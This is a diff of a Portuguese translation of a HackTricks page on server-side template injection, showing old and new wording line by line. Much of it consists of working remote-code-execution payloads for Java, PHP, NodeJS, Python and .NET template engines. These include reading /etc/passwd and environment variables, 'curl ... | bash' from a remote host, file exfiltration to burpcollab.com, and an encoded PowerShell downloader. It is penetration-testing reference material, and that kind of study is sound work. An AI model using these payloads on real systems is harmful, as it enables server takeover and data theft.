* **Compartilhe seus truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
@ -20,33 +20,33 @@ Outras formas de apoiar o HackTricks:
{% embed url="https://www.rootedcon.com/" %}
## O que é injeção de template no lado do servidor?
## O que é a injeção de modelo do lado do servidor?
Uma injeção de template no lado do servidor ocorre quando um atacante consegue usar a sintaxe nativa do template para injetar uma carga maliciosa em um template, que é então executado no lado do servidor.
Uma injeção de modelo do lado do servidor ocorre quando um atacante é capaz de usar a sintaxe de modelo nativa para injetar uma carga maliciosa em um modelo, que é então executado do lado do servidor.
**Motores de template** são projetados para **gerar páginas web** combinando **templates fixos** com **dados voláteis**. Ataques de injeção de template no lado do servidor podem ocorrer quando **entradas de usuários** são concatenadas diretamente **em um template**, em vez de serem passadas como dados. Isso permite que atacantes **injetem diretivas arbitrárias de template** para manipular o motor de template, muitas vezes possibilitando a eles tomar **controle completo do servidor**.
**Motores de modelo** são projetados para **gerar páginas web** combinando **modelos fixos** com **dados voláteis**. Os ataques de injeção de modelo do lado do servidor podem ocorrer quando a **entrada do usuário** é concatenada diretamente **em um modelo**, em vez de ser passada como dados. Isso permite que os atacantes **injetem diretivas de modelo arbitrárias** para manipular o motor de modelo, muitas vezes permitindo que assumam **controle completo do servidor**.
Um exemplo de código vulnerável é o seguinte:
Um exemplo de código vulnerável pode ser visto no seguinte trecho:
```php
$output = $twig->render("Dear " . $_GET['name']);
```
No exemplo anterior, **parte do template** está sendo **gerada dinamicamente** usando o parâmetro `GET` `name`. Como a sintaxe do template é avaliada pelo lado do servidor, isso potencialmente permite que um atacante coloque um payload de injeção de template do lado do servidor dentro do parâmetro `name` da seguinte forma:
No exemplo anterior **parte do modelo** em si está sendo **gerado dinamicamente** usando o parâmetro `GET` `name`. Como a sintaxe do modelo é avaliada no servidor, isso potencialmente permite que um atacante insira um payload de injeção de modelo do lado do servidor dentro do parâmetro `name` da seguinte forma:
```
http://vulnerable-website.com/?name={{bad-stuff-here}}
```
## Construindo um ataque de injeção de template no lado do servidor
## Construindo um ataque de injeção de modelo do lado do servidor
![](../../.gitbook/assets/ssti-methodology-diagram.png)
### Detectar
Como em qualquer vulnerabilidade, o primeiro passo para a exploração é ser capaz de encontrá-la. Talvez a abordagem inicial mais simples seja tentar **fuzzing no template** injetando uma sequência de caracteres especiais comumente usados em expressões de template, como o poliglota **`${{<%[%'"}}%\`.**\
Para verificar se o servidor está vulnerável, você deve **observar as diferenças** entre a resposta com **dados regulares** no parâmetro e o **payload fornecido**.\
Se um **erro for gerado**, será bastante fácil concluir que **o servidor está vulnerável** e até mesmo qual **motor está em execução**. Mas você também pode encontrar um servidor vulnerável se estiver **esperando** que ele **reflita** o payload fornecido e ele **não está sendo refletido**, ou se houver alguns **caracteres ausentes** na resposta.
Assim como em qualquer vulnerabilidade, o primeiro passo em direção à exploração é ser capaz de encontrá-la. Talvez a abordagem inicial mais simples seja tentar **fuzzar o modelo** injetando uma sequência de caracteres especiais comumente usados em expressões de modelo, como o poliglota **`${{<%[%'"}}%\`.**\
Para verificar se o servidor é vulnerável, você deve **observar as diferenças** entre a resposta com **dados regulares** no parâmetro e a **carga útil fornecida**.\
Se um **erro for lançado**, será bastante fácil descobrir que **o servidor é vulnerável** e até mesmo qual **motor está sendo executado**. Mas você também pode encontrar um servidor vulnerável se estivesse **esperando** que ele **refletisse** a carga útil fornecida e ela **não estiver sendo refletida** ou se houver alguns **caracteres ausentes** na resposta.
**Detectar - Contexto de texto simples**
A entrada fornecida está sendo **renderizada e refletida** na resposta. Isso é facilmente **confundido com uma simples** vulnerabilidade [**XSS**](../xss-cross-site-scripting/), mas é fácil diferenciar se você tentar definir **operações matemáticas** dentro de uma expressão de template:
A entrada fornecida está sendo **renderizada e refletida** na resposta. Isso é facilmente **confundido com uma vulnerabilidade** [**XSS**](../xss-cross-site-scripting/) simples, mas é fácil diferenciar se você tentar definir **operações matemáticas** dentro de uma expressão de modelo:
```
{{7*7}}
${7*7}
@ -55,23 +55,23 @@ ${{7*7}}
#{7*7}
*{7*7}
```
**Detectar - Contexto de código**
**Detect - Contexto do código**
Nestes casos, a **entrada do usuário** está sendo colocada **dentro** de uma **expressão de template**:
Nesses casos, a **entrada do usuário** está sendo colocada **dentro** de uma **expressão de modelo**:
```python
engine.render("Hello {{"+greeting+"}}", data)
```
O acesso à URL que acessa essa página pode ser semelhante a: `http://vulnerable-website.com/?greeting=data.username`
O acesso à página pode ser semelhante a: `http://vulnerable-website.com/?greeting=data.username`
Se você **alterar** o parâmetro **`greeting`** por um **valor diferente**, a **resposta não conterá o nome de usuário**, mas se você acessar algo como: `http://vulnerable-website.com/?greeting=data.username}}hello`, então, **a resposta conterá o nome de usuário** (se os caracteres de fechamento da expressão de template forem **`}}`**).\
Se um **erro** for gerado durante esses testes, será mais fácil encontrar se o servidor está vulnerável.
Se você **alterar** o parâmetro **`greeting`** para um **valor diferente**, a **resposta não conterá o nome de usuário**, mas se você acessar algo como: `http://vulnerable-website.com/?greeting=data.username}}hello`, então, **a resposta conterá o nome de usuário** (se os caracteres de fechamento da expressão do modelo forem **`}}`**).\
Se um **erro** for lançado durante esses testes, será mais fácil descobrir que o servidor é vulnerável.
### Identificar
Uma vez que você detectou o potencial de injeção de template, o próximo passo é identificar o motor de template.\
Embora existam um grande número de linguagens de template, muitas delas usam uma sintaxe muito semelhante que é escolhida especificamente para não entrar em conflito com os caracteres HTML.
Depois de detectar o potencial de injeção de modelo, o próximo passo é identificar o mecanismo de modelo.\
Embora existam muitas linguagens de modelagem, muitas delas usam uma sintaxe muito semelhante escolhida especificamente para não entrar em conflito com os caracteres HTML.
Se você tiver sorte, o servidor estará **imprimindo os erros** e você poderá encontrar o **motor** usado **dentro** dos erros. Algumas cargas úteis possíveis que podem causar erros:
Se tiver sorte, o servidor estará **imprimindo os erros** e você poderá encontrar o **mecanismo** usado **dentro** dos erros. Alguns payloads possíveis que podem causar erros:
| `${}` | `{{}}` | `<%= %>` |
| ----------- | ------------ | --------------- |
@ -79,38 +79,27 @@ Se você tiver sorte, o servidor estará **imprimindo os erros** e você poderá
| `${foobar}` | `{{foobar}}` | `<%= foobar %>` |
| `${7*7}` | `{{7*7}}` | \`\` |
Caso contrário, você precisará **testar manualmente diferentes cargas úteis específicas da linguagem** e estudar como elas são interpretadas pelo motor de template. Uma maneira comum de fazer isso é injetar operações matemáticas arbitrárias usando a sintaxe de diferentes motores de template. Você pode então observar se elas são avaliadas com sucesso. Para ajudar nesse processo, você pode usar uma árvore de decisão semelhante à seguinte:
Caso contrário, você precisará testar manualmente **diferentes payloads específicos da linguagem** e estudar como eles são interpretados pelo mecanismo de modelo. Uma maneira comum de fazer isso é injetar operações matemáticas arbitrárias usando sintaxe de diferentes mecanismos de modelo. Você pode então observar se são avaliados com sucesso. Para ajudar nesse processo, você pode usar uma árvore de decisão semelhante à seguinte:
![](<../../.gitbook/assets/image (272).png>)
### Explorar
**Ler**
Assumindo que nenhum exploit se apresentou, o próximo passo é **explorar o ambiente** para descobrir exatamente a que **você tem acesso**. Você pode esperar encontrar tanto **objetos padrão** fornecidos pelo mecanismo de modelo, quanto **objetos específicos da aplicação** passados para o modelo pelo desenvolvedor. Muitos sistemas de modelo expõem um objeto 'self' ou de namespace contendo tudo em escopo, e uma maneira idiomática de listar os atributos e métodos de um objeto.
O primeiro passo após encontrar a injeção de template e identificar o motor de template é ler a documentação. Áreas-chave de interesse são:
Se não houver um objeto self embutido, você terá que forçar nomes de variáveis usando [SecLists](https://github.com/danielmiessler/SecLists/blob/25d4ac447efb9e50b640649f1a09023e280e5c9c/Discovery/Web-Content/burp-parameter-names.txt) e a coleção de wordlists do Burp Intruder.
* Seções 'Para Autores de Template' que cobrem a sintaxe básica.
* 'Considerações de Segurança' - é provável que quem desenvolveu o aplicativo que você está testando não tenha lido isso, e pode conter algumas dicas úteis.
* Listas de métodos, funções, filtros e variáveis embutidos.
* Listas de extensões/plugins - alguns podem estar habilitados por padrão.
**Explorar**
Assumindo que nenhum exploit se apresentou, o próximo passo é **explorar o ambiente** para descobrir exatamente a que **você tem acesso**. Você pode esperar encontrar tanto **objetos padrão** fornecidos pelo motor de template, quanto **objetos específicos da aplicação** passados para o template pelo desenvolvedor. Muitos sistemas de template expõem um objeto 'self' ou namespace contendo tudo no escopo, e uma maneira idiomática de listar os atributos e métodos de um objeto.
Se não houver um objeto self embutido, você terá que forçar bruta os nomes das variáveis usando [SecLists](https://github.com/danielmiessler/SecLists/blob/25d4ac447efb9e50b640649f1a09023e280e5c9c/Discovery/Web-Content/burp-parameter-names.txt) e a coleção de wordlist do Burp Intruder.
Objetos fornecidos pelo desenvolvedor são particularmente propensos a conter informações sensíveis e podem variar entre diferentes templates dentro de uma aplicação, portanto, esse processo deve idealmente ser aplicado a cada template distinto individualmente.
Objetos fornecidos pelo desenvolvedor são particularmente propensos a conter informações sensíveis e podem variar entre diferentes modelos dentro de uma aplicação, portanto, esse processo deve idealmente ser aplicado a cada modelo distinto individualmente.
**Atacar**
Neste ponto, você deve ter uma **ideia firme da superfície de ataque disponível** para você e poderá prosseguir com técnicas tradicionais de auditoria de segurança, revisando cada função em busca de vulnerabilidades exploráveis. É importante abordar isso no contexto da aplicação mais ampla - algumas funções podem ser usadas para explorar recursos específicos da aplicação. Os exemplos a seguir usarão injeção de template para acionar a criação de objetos arbitrários, leitura/escrita de arquivos arbitrários, inclusão de arquivos remotos, divulgação de informações e vulnerabilidades de escalonamento de privilégios.
Neste ponto, você deve ter uma **ideia clara da superfície de ataque disponível** para você e ser capaz de prosseguir com técnicas tradicionais de auditoria de segurança, revisando cada função em busca de vulnerabilidades exploráveis. É importante abordar isso no contexto da aplicação mais ampla - algumas funções podem ser usadas para explorar recursos específicos da aplicação. Os exemplos a seguir usarão a injeção de modelo para acionar a criação arbitrária de objetos, leitura/gravação arbitrária de arquivos, inclusão remota de arquivos, divulgação de informações e vulnerabilidades de escalonamento de privilégios.
## Ferramentas
### [TInjA](https://github.com/Hackmanit/TInjA)
um scanner eficiente de SSTI + CSTI que utiliza políglotas inovadores
um scanner eficiente de SSTI + CSTI que utiliza políglotos inovadores
```bash
tinja url -u "http://example.com/?name=Kirlia" -H "Authentication: Bearer ey..."
tinja url -u "http://example.com/" -d "username=Kirlia" -c "PHPSESSID=ABC123..."
@ -129,19 +118,19 @@ python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment
```
### [Tabela de Injeção de Template](https://github.com/Hackmanit/template-injection-table)
uma tabela interativa contendo os poliglotas de injeção de template mais eficientes junto com as respostas esperadas dos 44 motores de template mais importantes.
uma tabela interativa contendo os poliglotas de injeção de template mais eficientes juntamente com as respostas esperadas dos 44 motores de template mais importantes.
## Exploits
### Genérico
Nesta **wordlist** você pode encontrar **variáveis definidas** nos ambientes de alguns dos motores mencionados abaixo:
Nesta **lista de palavras** você pode encontrar **variáveis definidas** nos ambientes de alguns dos motores mencionados abaixo:
* [https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/template-engines-special-vars.txt](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/template-engines-special-vars.txt)
### Java
**Java - Injeção básica**
**Java - Injeção Básica**
```java
${7*7}
${{7*7}}
@ -149,11 +138,11 @@ ${class.getClassLoader()}
${class.getResource("").getPath()}
${class.getResource("../../../../../index.htm").getContent()}
```
**Java - Recuperar as variáveis de ambiente do sistema**
**Java - Obter as variáveis de ambiente do sistema**
```java
${T(java.lang.System).getenv()}
```
**Java - Recuperar /etc/passwd**
**Java - Obter /etc/passwd**
```java
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
@ -161,12 +150,12 @@ ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().ex
```
### FreeMarker (Java)
Você pode testar seus payloads em [https://try.freemarker.apache.org](https://try.freemarker.apache.org)
Você pode tentar seus payloads em [https://try.freemarker.apache.org](https://try.freemarker.apache.org)
* `{{7*7}} = {{7*7}}`
* `${7*7} = 49`
* `#{7*7} = 49 -- (legado)`
* `${7*'7'} Nada`
* `#{7*7} = 49 -- (legacy)`
* `${7*'7'} Nothing`
* `${foobar}`
```java
<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
@ -208,20 +197,20 @@ $str.valueOf($chr.toChars($out.read()))
### Thymeleaf (Java)
A expressão de teste típica para SSTI é `${7*7}`. Esta expressão também funciona no Thymeleaf. Se você deseja alcançar execução remota de código, pode usar uma das seguintes expressões de teste:
A expressão de teste típica para SSTI é `${7*7}`. Esta expressão também funciona no Thymeleaf. Se desejar obter execução de código remoto, pode usar uma das seguintes expressões de teste:
* SpringEL: `${T(java.lang.Runtime).getRuntime().exec('calc')}`
* OGNL: `${#rt = @java.lang.Runtime@getRuntime(),#rt.exec("calc")}`
No entanto, como mencionamos anteriormente, expressões só funcionam em atributos especiais do Thymeleaf. Se for necessário usar uma expressão em um local diferente no template, o Thymeleaf suporta _inserção de expressões_. Para usar esse recurso, você deve colocar uma expressão dentro de `[[...]]` ou `[(...)]` (escolha um ou outro dependendo se você precisa escapar símbolos especiais). Portanto, um payload simples de detecção de SSTI para Thymeleaf seria `[[${7*7}]]`.
No entanto, como mencionado anteriormente, as expressões só funcionam em atributos especiais do Thymeleaf. Se for necessário usar uma expressão em uma localização diferente no modelo, o Thymeleaf suporta _inlining de expressão_. Para usar esse recurso, é necessário colocar uma expressão dentro de `[[...]]` ou `[(...)]` (selecione um ou outro dependendo se precisa escapar de símbolos especiais). Portanto, um payload simples de detecção de SSTI para Thymeleaf seria `[[${7*7}]]`.
As chances de o payload de detecção acima funcionar são, no entanto, muito baixas. Vulnerabilidades de SSTI geralmente ocorrem quando um template é gerado dinamicamente no código. O Thymeleaf, por padrão, não permite tais templates gerados dinamicamente e todos os templates devem ser criados anteriormente. Portanto, se um desenvolvedor deseja criar um template a partir de uma string _em tempo real_, ele precisaria criar seu próprio TemplateResolver. Isso é possível, mas acontece muito raramente.
No entanto, as chances de o payload de detecção acima funcionar são muito baixas. As vulnerabilidades de SSTI geralmente ocorrem quando um modelo é gerado dinamicamente no código. O Thymeleaf, por padrão, não permite modelos gerados dinamicamente e todos os modelos devem ser criados antecipadamente. Portanto, se um desenvolvedor deseja criar um modelo a partir de uma string _na hora_, eles precisariam criar seu próprio TemplateResolver. Isso é possível, mas acontece muito raramente.
Se olharmos mais a fundo na documentação do motor de template do Thymeleaf, encontraremos um recurso interessante chamado _**pré-processamento de expressões**_. Expressões colocadas entre duplos sublinhados (`__...__`) são pré-processadas e o resultado do pré-processamento é usado como parte da expressão durante o processamento regular. Aqui está um exemplo oficial da documentação do Thymeleaf:
Se analisarmos mais a fundo a documentação do mecanismo de modelo Thymeleaf, encontraremos um recurso interessante chamado _**pré-processamento de expressão**_. Expressões colocadas entre dois sublinhados duplos (`__...__`) são pré-processadas e o resultado do pré-processamento é usado como parte da expressão durante o processamento regular. Aqui está um exemplo oficial da documentação do Thymeleaf:
```java
#{selection.__${sel.code}__}
```
**Exemplo Vulnerável**
**Exemplo vulnerável**
```markup
<a th:href="@{__${path}__}" th:title="${title}">
<a th:href="${''.getClass().forName('java.lang.Runtime').getRuntime().exec('curl -d @/flag.txt burpcollab.com')}" th:title='pepito'>
@ -241,15 +230,15 @@ http://localhost:8082/(${T(java.lang.Runtime).getRuntime().exec('calc')})
```java
*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}
```
**Bypass de filtros**
**Burlar filtros**
Múltiplas expressões de variáveis podem ser usadas, se `${...}` não funcionar tente `#{...}`, `*{...}`, `@{...}` ou `~{...}`.
Múltiplas expressões de variáveis podem ser usadas, se `${...}` não funcionar, tente `#{...}`, `*{...}`, `@{...}` ou `~{...}`.
* Ler `/etc/passwd`
```java
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
```
* Script Personalizado para geração de payload
* Script personalizado para geração de payload
```python
#!/usr/bin/python3
@ -324,13 +313,15 @@ Nova versão do Pebble:
.newInstance(([bytes]).toArray()) }}
```
### Jinjava (Java)
Jinjava é uma biblioteca Java para análise e renderização de modelos de texto. Ele fornece suporte para injeção de modelo do lado do servidor (SSTI) e é comumente usado em aplicativos da web Java para processar modelos dinâmicos. Ao explorar vulnerabilidades de SSTI em aplicativos da web Java que usam Jinjava, os testadores de penetração podem ser capazes de executar código arbitrário no servidor.
```java
{{'a'.toUpperCase()}} would result in 'A'
{{ request }} would return a request object like com.[...].context.TemplateContextRequest@23548206
```
Jinjava é um projeto de código aberto desenvolvido pela Hubspot, disponível em [https://github.com/HubSpot/jinjava/](https://github.com/HubSpot/jinjava/)
**Jinjava - Execução de comando**
**Jinjava - Execução de Comandos**
Corrigido por [https://github.com/HubSpot/jinjava/pull/230](https://github.com/HubSpot/jinjava/pull/230)
```java
@ -348,9 +339,9 @@ Corrigido por [https://github.com/HubSpot/jinjava/pull/230](https://github.com/H
### Hubspot - HuBL (Java)
* `{% %}` delimitadores de instrução
* `{{ }}` delimitadores de expressão
* `{# #}` delimitadores de comentário
* Delimitadores de declaração `{% %}`
* Delimitadores de expressão `{{ }}`
* Delimitadores de comentário `{# #}`
* `{{ request }}` - com.hubspot.content.hubl.context.TemplateContextRequest@23548206
* `{{'a'.toUpperCase()}}` - "A"
* `{{'a'.concat('b')}}` - "ab"
@ -358,7 +349,7 @@ Corrigido por [https://github.com/HubSpot/jinjava/pull/230](https://github.com/H
* `{{request.getClass()}}` - class com.hubspot.content.hubl.context.TemplateContextRequest
* `{{request.getClass().getDeclaredMethods()[0]}}` - public boolean com.hubspot.content.hubl.context.TemplateContextRequest.isDebug()
Procure por "com.hubspot.content.hubl.context.TemplateContextRequest" e descobriu o [projeto Jinjava no Github](https://github.com/HubSpot/jinjava/).
Pesquise por "com.hubspot.content.hubl.context.TemplateContextRequest" e descubra o [projeto Jinjava no Github](https://github.com/HubSpot/jinjava/).
```java
{{request.isDebug()}}
//output: False
@ -407,7 +398,7 @@ Payload: {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstanc
* [https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html)
### Expression Language - EL (Java)
### Linguagem de Expressão - EL (Java)
* `${"aaaa"}` - "aaaa"
* `${99999+1}` - 100000.
@ -415,8 +406,8 @@ Payload: {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstanc
* `${{7*7}}` - 49
* `${{request}}, ${{session}}, {{faceContext}}`
EL fornece um mecanismo importante para permitir que a camada de apresentação (páginas web) comunique-se com a lógica da aplicação (managed beans). O EL é utilizado por **várias tecnologias JavaEE**, como a tecnologia JavaServer Faces, tecnologia JavaServer Pages (JSP) e Contexts and Dependency Injection para Java EE (CDI).\
Confira a seguinte página para aprender mais sobre a **exploração de interpretadores EL**:
EL fornece um mecanismo importante para permitir que a camada de apresentação (páginas da web) se comunique com a lógica da aplicação (beans gerenciados). O EL é usado por **várias tecnologias JavaEE**, como a tecnologia JavaServer Faces, a tecnologia JavaServer Pages (JSP) e a Injeção de Contextos e Dependências para Java EE (CDI).\
Confira a página a seguir para aprender mais sobre a **exploração dos interpretadores EL**:
{% content-ref url="el-expression-language.md" %}
[el-expression-language.md](el-expression-language.md)
@ -424,7 +415,7 @@ Confira a seguinte página para aprender mais sobre a **exploração de interpre
### Groovy (Java)
Esta forma de contornar o Security Manager foi retirada deste [**relatório**](https://security.humanativaspa.it/groovy-template-engine-exploitation-notes-from-a-real-case-scenario/).
Os seguintes desvios do Gerenciador de Segurança foram retirados deste [**artigo**](https://security.humanativaspa.it/groovy-template-engine-exploitation-notes-from-a-real-case-scenario/).
```java
//Basic Payload
import groovy.*;
@ -475,8 +466,8 @@ this.evaluate(new String(new byte[]{64, 103, 114, 111, 111, 118, 121, 46, 116, 1
* `{{7*7}} = 49`
* `${7*7} = ${7*7}`
* `{{7*'7'}} = 49`
* `{{1/0}} = Erro`
* `{{foobar}} Nada`
* `{{1/0}} = Error`
* `{{foobar}} Nothing`
```python
#Get Info
{{_self}} #(Ref. to current application)
@ -500,7 +491,7 @@ this.evaluate(new String(new byte[]{64, 103, 114, 111, 111, 118, 121, 46, 116, 1
#Hide warnings and errors for automatic exploitation
{{["error_reporting", "0"]|sort("ini_set")}}
```
**Twig - Formato de template**
**Twig - Formato de Template**
```php
$output = $twig > render (
'Dear' . $_GET['custom_greeting'],
@ -519,9 +510,9 @@ array("first_name" => $user.first_name)
### Plates (PHP)
Plates é inspirado pelo Twig, mas é um motor de template PHP nativo em vez de um motor de template compilado.
Plates é inspirado no Twig, mas é um mecanismo de modelo PHP nativo em vez de um mecanismo de modelo compilado.
controller:
controlador:
```php
// Create new Plates instance
$templates = new League\Plates\Engine('/path/to/templates');
@ -536,7 +527,7 @@ modelo de página:
<h1>User Profile</h1>
<p>Hello, <?=$this->e($name)?></p>
```
layout de template:
modelo de layout:
```html
<html>
<head>
@ -573,7 +564,7 @@ layout de template:
</body>
</html>
```
`authors.php`
`autores.php`
```php
<?php
//we want to display this author list
@ -605,6 +596,8 @@ $t->parse('authorline_ref', 'authorline', true);
echo $t->finish($t->parse('OUT', 'authors'));
?>
```
### Jade (NodeJS)
### Jade (NodeJS)
```javascript
- var x = root.process
@ -623,7 +616,7 @@ echo $t->finish($t->parse('OUT', 'authors'));
### patTemplate (PHP)
> [patTemplate](https://github.com/wernerwa/pat-template) é um motor de templating PHP que não compila, e utiliza tags XML para dividir um documento em diferentes partes
> [patTemplate](https://github.com/wernerwa/pat-template) é um mecanismo de modelagem PHP não compilado que usa tags XML para dividir um documento em diferentes partes.
```xml
<patTemplate:tmpl name="page">
This is the main page.
@ -637,7 +630,7 @@ Hello {NAME}.<br/>
```
### Handlebars (NodeJS)
Path Traversal (mais informações [aqui](https://blog.shoebpatel.com/2021/01/23/The-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps/)).
Travessia de Caminho (mais informações [aqui](https://blog.shoebpatel.com/2021/01/23/The-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps/)).
```bash
curl -X 'POST' -H 'Content-Type: application/json' --data-binary $'{\"profile\":{"layout\": \"./../routes/index.js\"}}' 'http://ctf.shoebpatel.com:9090/'
```
@ -674,12 +667,12 @@ URLencoded:
### JsRender (NodeJS)
| **Template** | **Descrição** |
| **Modelo** | **Descrição** |
| ------------ | --------------------------------------- |
| | Avaliar e renderizar saída |
| | Avaliar e renderizar saída codificada em HTML |
| | Comentário |
| and | Permitir código (desativado por padrão) |
| | Comentário |
| e | Permitir código (desativado por padrão) |
* \= 49
@ -701,7 +694,7 @@ URLencoded:
* `#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('touch /tmp/pwned.txt')}()}`
* `#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('curl 10.10.14.3:8001/s.sh | bash')}()}`
**Exemplo de renderização do lado do servidor**
**Exemplo de renderização no lado do servidor**
```javascript
var pugjs = require('pug');
home = pugjs.render(injected_page)
@ -714,7 +707,7 @@ home = pugjs.render(injected_page)
* \{{7\*7\}} = 49
* \{{foo\}} = Sem saída
* \#{7\*7} = \#{7\*7}
* \#{7\*7} = #{7\*7}
* \{{console.log(1)\}} = Erro
```javascript
{{range.constructor("return global.process.mainModule.require('child_process').execSync('tail /etc/passwd')")()}}
@ -757,7 +750,7 @@ home = pugjs.render(injected_page)
### Python
Confira a seguinte página para aprender truques sobre **execução de comandos arbitrários contornando sandboxes** em python:
Confira a seguinte página para aprender truques sobre **burlar as caixas de areia de execução de comandos arbitrários** em python:
{% content-ref url="../../generic-methodologies-and-resources/python/bypass-python-sandboxes/" %}
[bypass-python-sandboxes](../../generic-methodologies-and-resources/python/bypass-python-sandboxes/)
@ -767,7 +760,7 @@ Confira a seguinte página para aprender truques sobre **execução de comandos
* `{{7*7}} = 49`
* `${7*7} = ${7*7}`
* `{{foobar}} = Erro`
* `{{foobar}} = Error`
* `{{7*'7'}} = 7777777`
```python
{% raw %}
@ -792,7 +785,7 @@ Confira a seguinte página para aprender truques sobre **execução de comandos
[Site oficial](http://jinja.pocoo.org)
> Jinja2 é um motor de templates completo para Python. Possui suporte total a unicode, um ambiente de execução opcional integrado e protegido, amplamente utilizado e licenciado pela BSD.
> Jinja2 é um mecanismo de modelo completo para Python. Possui suporte total a Unicode, um ambiente de execução isolado opcionalmente integrado, amplamente utilizado e licenciado sob a BSD.
* `{{7*7}} = Erro`
* `${7*7} = ${7*7}`
@ -833,7 +826,7 @@ Confira a seguinte página para aprender truques sobre **execução de comandos
```
[**RCE independente de**](https://podalirius.net/en/articles/python-vulnerabilities-code-execution-in-jinja-templates/) `__builtins__`:
[**RCE não dependente de**](https://podalirius.net/en/articles/python-vulnerabilities-code-execution-in-jinja-templates/) `__builtins__`:
```python
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
{{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }}
@ -862,16 +855,16 @@ ${x}
* `@(2+2) <= Sucesso`
* `@() <= Sucesso`
* `@("{{code}}") <= Sucesso`
* `@ <=Sucesso`
* `@("{{código}}") <= Sucesso`
* `@ <= Sucesso`
* `@{} <= ERRO!`
* `@{ <= ERRO!`
* `@(1+2)`
* `@( //C#Code )`
* `@( //Código C# )`
* `@System.Diagnostics.Process.Start("cmd.exe","/c echo RCE > C:/Windows/Tasks/test.txt");`
* `@System.Diagnostics.Process.Start("cmd.exe","/c powershell.exe -enc IABpAHcAcgAgAC0AdQByAGkAIABoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAyAC4AMQAxADEALwB0AGUAcwB0AG0AZQB0ADYANAAuAGUAeABlACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAYQBzAGsAcwBcAHQAZQBzAHQAbQBlAHQANgA0AC4AZQB4AGUAOwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGEAcwBrAHMAXAB0AGUAcwB0AG0AZQB0ADYANAAuAGUAeABlAA==");`
* `@System.Diagnostics.Process.Start("cmd.exe","/c powershell.exe -enc IABpAHcAcgAgAC0AdQByAGkAIABoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAyAC4MQAxADEALwB0AGUAcwB0AG0AZQB0ADYANAAuAGUAeABlACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAYQBzAGsAcwBcAHQAZQBzAHQAbQBlAHQANgA0AC4AZQB4AGUAOwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGEAcwBrAHMAXAB0AGUAcwB0AG0AZQB0ADYANAAuAGUAeABlAA==");`
O método `System.Diagnostics.Process.Start` do .NET pode ser usado para iniciar qualquer processo no servidor e, assim, criar uma webshell. Você pode encontrar um exemplo de aplicativo web vulnerável em [https://github.com/cnotin/RazorVulnerableApp](https://github.com/cnotin/RazorVulnerableApp)
O método `.NET` `System.Diagnostics.Process.Start` pode ser usado para iniciar qualquer processo no servidor e assim criar um webshell. Você pode encontrar um exemplo de aplicativo da web vulnerável em [https://github.com/cnotin/RazorVulnerableApp](https://github.com/cnotin/RazorVulnerableApp)
**Mais informações**
@ -889,11 +882,11 @@ O método `System.Diagnostics.Process.Start` do .NET pode ser usado para iniciar
```
**Mais Informações**
* [https://www.w3schools.com/asp/asp_examples.asp](https://www.w3schools.com/asp/asp_examples.asp)
* [https://www.w3schools.com/asp/asp\_examples.asp](https://www.w3schools.com/asp/asp\_examples.asp)
### Mojolicious (Perl)
Mesmo sendo Perl, utiliza tags como ERB em Ruby.
Mesmo sendo perl, ele usa tags como ERB em Ruby.
* `<%= 7*7 %> = 49`
* `<%= foobar %> = Erro`
@ -903,26 +896,26 @@ Mesmo sendo Perl, utiliza tags como ERB em Ruby.
```
### SSTI em GO
Para confirmar que o motor de template usado no backend é Go, você pode usar estes payloads:
A maneira de confirmar que o mecanismo de template usado no backend é Go é usando esses payloads:
* `{{ . }}` = estrutura de dados sendo passada como entrada para o template
* Se os dados passados forem um objeto que contém o atributo Password, por exemplo, o payload anterior revelaria isso, mas você também poderia fazer: `{{ .Password }}`
* `{{printf "%s" "ssti" }}` = deve exibir a string ssti na resposta
* `{{html "ssti"}}`, `{{js "ssti"}}` = Estes são alguns outros payloads que devem exibir a string "ssti" sem as palavras finais "js" ou "html". Você pode consultar mais palavras-chave no motor [aqui](https://golang.org/pkg/text/template).
- `{{ . }}` = estrutura de dados sendo passada como entrada para o template
- Se os dados passados são um objeto que contém o atributo Password, por exemplo, o payload anterior poderia vazar isso, mas você também poderia fazer: `{{ .Password }}`
- `{{printf "%s" "ssti" }}` = deve exibir a string ssti na resposta
